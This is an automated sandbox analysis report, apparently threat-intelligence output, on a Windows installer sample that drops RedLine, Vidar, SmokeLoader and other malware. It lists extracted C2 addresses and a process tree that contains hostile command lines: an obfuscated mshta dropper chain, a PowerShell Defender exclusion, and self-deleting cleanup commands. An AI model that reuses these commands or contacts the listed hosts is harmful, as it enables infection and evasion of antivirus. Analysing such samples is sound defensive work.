Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    243s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 08:18

General

  • Target

    Setup (2).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 39 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 28 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2660
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        PID:2556
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:896
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2336
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1944
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1256
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1216
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:936
                      • C:\Users\Admin\AppData\Roaming\varcwar
                        C:\Users\Admin\AppData\Roaming\varcwar
                        2⤵
                          PID:7028
                        • C:\Users\Admin\AppData\Roaming\vercwar
                          C:\Users\Admin\AppData\Roaming\vercwar
                          2⤵
                            PID:8508
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:284
                          • C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4080
                            • C:\Users\Admin\Documents\TR8g17Dv7mJghqUGd9HkpKSU.exe
                              "C:\Users\Admin\Documents\TR8g17Dv7mJghqUGd9HkpKSU.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:2096
                              • C:\Users\Admin\Documents\TR8g17Dv7mJghqUGd9HkpKSU.exe
                                C:\Users\Admin\Documents\TR8g17Dv7mJghqUGd9HkpKSU.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4576
                            • C:\Users\Admin\Documents\zwkWRwETpLQzQ_3ZxQWUmlVK.exe
                              "C:\Users\Admin\Documents\zwkWRwETpLQzQ_3ZxQWUmlVK.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4008
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im zwkWRwETpLQzQ_3ZxQWUmlVK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\zwkWRwETpLQzQ_3ZxQWUmlVK.exe" & del C:\ProgramData\*.dll & exit
                                3⤵
                                  PID:4544
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im zwkWRwETpLQzQ_3ZxQWUmlVK.exe /f
                                    4⤵
                                    • Kills process with taskkill
                                    PID:5260
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    4⤵
                                    • Delays execution with timeout.exe
                                    PID:7932
                              • C:\Users\Admin\Documents\ARohJFQ8u4iFdmtbYV248Hj4.exe
                                "C:\Users\Admin\Documents\ARohJFQ8u4iFdmtbYV248Hj4.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3812
                              • C:\Users\Admin\Documents\g4Rj9YjXHC2i5L4CqmJvbIhN.exe
                                "C:\Users\Admin\Documents\g4Rj9YjXHC2i5L4CqmJvbIhN.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2268
                              • C:\Users\Admin\Documents\9CSqs8iJbIg2rpFjYPmL7Qsi.exe
                                "C:\Users\Admin\Documents\9CSqs8iJbIg2rpFjYPmL7Qsi.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3516
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 388
                                  3⤵
                                  • Program crash
                                  PID:2628
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 400
                                  3⤵
                                  • Program crash
                                  PID:4816
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 388
                                  3⤵
                                  • Program crash
                                  PID:5232
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 624
                                  3⤵
                                  • Program crash
                                  PID:5468
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 660
                                  3⤵
                                  • Program crash
                                  PID:5764
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 696
                                  3⤵
                                  • Program crash
                                  PID:5860
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 752
                                  3⤵
                                  • Program crash
                                  PID:5976
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 816
                                  3⤵
                                  • Program crash
                                  PID:6016
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 716
                                  3⤵
                                  • Program crash
                                  PID:8168
                                • C:\Users\Admin\Documents\9CSqs8iJbIg2rpFjYPmL7Qsi.exe
                                  "C:\Users\Admin\Documents\9CSqs8iJbIg2rpFjYPmL7Qsi.exe"
                                  3⤵
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:7172
                              • C:\Users\Admin\Documents\YkaEBUWXd0XXlTNg2j5EsJrA.exe
                                "C:\Users\Admin\Documents\YkaEBUWXd0XXlTNg2j5EsJrA.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3616
                              • C:\Users\Admin\Documents\LLmojPEwjGhCrEp2JdtjCu_Q.exe
                                "C:\Users\Admin\Documents\LLmojPEwjGhCrEp2JdtjCu_Q.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2596
                                • C:\Users\Admin\AppData\Roaming\2850603.exe
                                  "C:\Users\Admin\AppData\Roaming\2850603.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1000
                                • C:\Users\Admin\AppData\Roaming\6174495.exe
                                  "C:\Users\Admin\AppData\Roaming\6174495.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:4476
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5720
                                • C:\Users\Admin\AppData\Roaming\3888960.exe
                                  "C:\Users\Admin\AppData\Roaming\3888960.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4732
                                • C:\Users\Admin\AppData\Roaming\6035342.exe
                                  "C:\Users\Admin\AppData\Roaming\6035342.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4448
                              • C:\Users\Admin\Documents\9OgO37xOrdYs7_id7UoLabVI.exe
                                "C:\Users\Admin\Documents\9OgO37xOrdYs7_id7UoLabVI.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3792
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 480
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4852
                              • C:\Users\Admin\Documents\S_f8xubTLImR1ibutp_6X5cP.exe
                                "C:\Users\Admin\Documents\S_f8xubTLImR1ibutp_6X5cP.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1068
                                • C:\Users\Admin\Documents\S_f8xubTLImR1ibutp_6X5cP.exe
                                  "C:\Users\Admin\Documents\S_f8xubTLImR1ibutp_6X5cP.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4832
                              • C:\Users\Admin\Documents\wrC76ZnSr0mxbYCcJXomG2ZI.exe
                                "C:\Users\Admin\Documents\wrC76ZnSr0mxbYCcJXomG2ZI.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                • Drops file in Windows directory
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2220
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\C08dlaXeJV.bat"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:5264
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                      PID:6680
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      4⤵
                                        PID:932
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        4⤵
                                          PID:7328
                                        • C:\Users\Admin\Documents\EnableReceive\X2Lb1k5RXSFu6q3pmKltwAZe.exe
                                          "C:\Users\Admin\Documents\EnableReceive\X2Lb1k5RXSFu6q3pmKltwAZe.exe"
                                          4⤵
                                            PID:8648
                                      • C:\Users\Admin\Documents\Tm3hPKlL1LU4MvwRrRWITVxN.exe
                                        "C:\Users\Admin\Documents\Tm3hPKlL1LU4MvwRrRWITVxN.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2092
                                        • C:\Users\Admin\Documents\Tm3hPKlL1LU4MvwRrRWITVxN.exe
                                          "C:\Users\Admin\Documents\Tm3hPKlL1LU4MvwRrRWITVxN.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:4192
                                      • C:\Users\Admin\Documents\SnBQtufzhteaQiIsvgnFWiC6.exe
                                        "C:\Users\Admin\Documents\SnBQtufzhteaQiIsvgnFWiC6.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1580
                                      • C:\Users\Admin\Documents\F5IURhBrYg8faWit3CcnaQN0.exe
                                        "C:\Users\Admin\Documents\F5IURhBrYg8faWit3CcnaQN0.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of WriteProcessMemory
                                        PID:1828
                                        • C:\Users\Admin\Documents\F5IURhBrYg8faWit3CcnaQN0.exe
                                          C:\Users\Admin\Documents\F5IURhBrYg8faWit3CcnaQN0.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4528
                                      • C:\Users\Admin\Documents\_JiL5r3tOosEYAkKRChVg4AE.exe
                                        "C:\Users\Admin\Documents\_JiL5r3tOosEYAkKRChVg4AE.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3564
                                      • C:\Users\Admin\Documents\kSamnURlwq3axiFMk1MV2332.exe
                                        "C:\Users\Admin\Documents\kSamnURlwq3axiFMk1MV2332.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2432
                                        • C:\Users\Admin\AppData\Local\Temp\ssqq.exe
                                          "C:\Users\Admin\AppData\Local\Temp\ssqq.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4632
                                      • C:\Users\Admin\Documents\X2Lb1k5RXSFu6q3pmKltwAZe.exe
                                        "C:\Users\Admin\Documents\X2Lb1k5RXSFu6q3pmKltwAZe.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1540
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 476
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5052
                                      • C:\Users\Admin\Documents\6V7JA25e8FLxTqcY9VUfhNfn.exe
                                        "C:\Users\Admin\Documents\6V7JA25e8FLxTqcY9VUfhNfn.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1228
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 660
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4204
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 680
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4612
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 636
                                          3⤵
                                          • Program crash
                                          PID:4664
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 668
                                          3⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1208
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 1124
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4664
                                      • C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe
                                        "C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2492
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                          3⤵
                                            PID:4832
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\jz8wCEeE09lUKWOxVWvmJIc3.exe" ) do taskkill -IM "%~nXW" -f
                                              4⤵
                                                PID:4888
                                                • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                  WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4744
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                    6⤵
                                                      PID:5556
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                        7⤵
                                                          PID:6024
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:5876
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -IM "jz8wCEeE09lUKWOxVWvmJIc3.exe" -f
                                                      5⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4012
                                              • C:\Users\Admin\Documents\yW7TXblRX3nXpH7a2hKAOhF9.exe
                                                "C:\Users\Admin\Documents\yW7TXblRX3nXpH7a2hKAOhF9.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2272
                                                • C:\Users\Admin\Documents\yW7TXblRX3nXpH7a2hKAOhF9.exe
                                                  "C:\Users\Admin\Documents\yW7TXblRX3nXpH7a2hKAOhF9.exe" -q
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:5004
                                              • C:\Users\Admin\Documents\zmcsEZr47Ce9QDf0GVOA6xks.exe
                                                "C:\Users\Admin\Documents\zmcsEZr47Ce9QDf0GVOA6xks.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3868
                                              • C:\Users\Admin\Documents\HSY3hhRbV3cr9PH692Kz3wvR.exe
                                                "C:\Users\Admin\Documents\HSY3hhRbV3cr9PH692Kz3wvR.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2132
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\HSY3HH~1.DLL,s C:\Users\Admin\DOCUME~1\HSY3HH~1.EXE
                                                  3⤵
                                                  • Loads dropped DLL
                                                  PID:5664
                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HSY3HH~1.DLL,gVcqNDJnRGs=
                                                    4⤵
                                                      PID:7980
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\HSY3HH~1.DLL
                                                        5⤵
                                                          PID:7628
                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HSY3HH~1.DLL,X1YISDRUaQ==
                                                          5⤵
                                                            PID:7636
                                                            • C:\Windows\system32\rundll32.exe
                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                              6⤵
                                                                PID:4160
                                                                • C:\Windows\system32\ctfmon.exe
                                                                  ctfmon.exe
                                                                  7⤵
                                                                    PID:2036
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp494B.tmp.ps1"
                                                                5⤵
                                                                  PID:4748
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpD970.tmp.ps1"
                                                                  5⤵
                                                                    PID:5600
                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                      "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                      6⤵
                                                                        PID:6248
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                      5⤵
                                                                        PID:7408
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                        5⤵
                                                                          PID:8848
                                                                  • C:\Users\Admin\Documents\7B9GkH91LhmGC8dGXmKIpCKI.exe
                                                                    "C:\Users\Admin\Documents\7B9GkH91LhmGC8dGXmKIpCKI.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4736
                                                                • C:\Users\Admin\AppData\Local\Temp\is-O841I.tmp\7B9GkH91LhmGC8dGXmKIpCKI.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O841I.tmp\7B9GkH91LhmGC8dGXmKIpCKI.tmp" /SL5="$301C0,138429,56832,C:\Users\Admin\Documents\7B9GkH91LhmGC8dGXmKIpCKI.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4896
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RKC3I.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RKC3I.tmp\Setup.exe" /Verysilent
                                                                    2⤵
                                                                      PID:5876
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks processor information in registry
                                                                        PID:2984
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                          4⤵
                                                                            PID:7460
